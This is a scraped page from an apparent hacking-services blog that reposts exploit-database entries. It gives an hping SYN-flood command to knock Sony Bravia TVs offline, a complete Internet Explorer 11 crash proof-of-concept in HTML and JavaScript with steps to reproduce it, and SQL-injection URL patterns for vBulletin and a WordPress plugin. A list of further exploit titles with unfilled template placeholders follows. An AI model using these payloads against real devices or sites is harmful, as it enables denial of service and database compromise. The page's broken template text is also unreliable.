source: https://www.securityfocus.com/bid/52893/info
Sony Bravia is prone to a remote denial-of-service vulnerability.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
hping -S TV.IP.Address -p anyport -i u1 --flood
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863144171
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
source: https://www.securityfocus.com/bid/52897/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.10 is vulnerable; other versions may also be affected.
http://www.example.com/announcement.php?a=&announcementid=[Sql]
source: https://www.securityfocus.com/bid/52908/info
TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.
http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]

- Read more...
- 0 comments
- 1 view

Phoenix Contact ILC 150 ETH PLC - Remote Control Script
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

ZOC SSH Client - Buffer Overflow (SEH) (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Forma LMS 1.3 - Multiple SQL Injections
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Seditio CMS 165 - 'plug.php' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Plugin FeedWordPress 2015.0426 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

CitrusDB 2.4.1 - Local File Inclusion / SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Bioly 1.3 - '/index.php' Cross-Site Scripting / SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Munin 2.0~rc4-1 - Remote Command Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view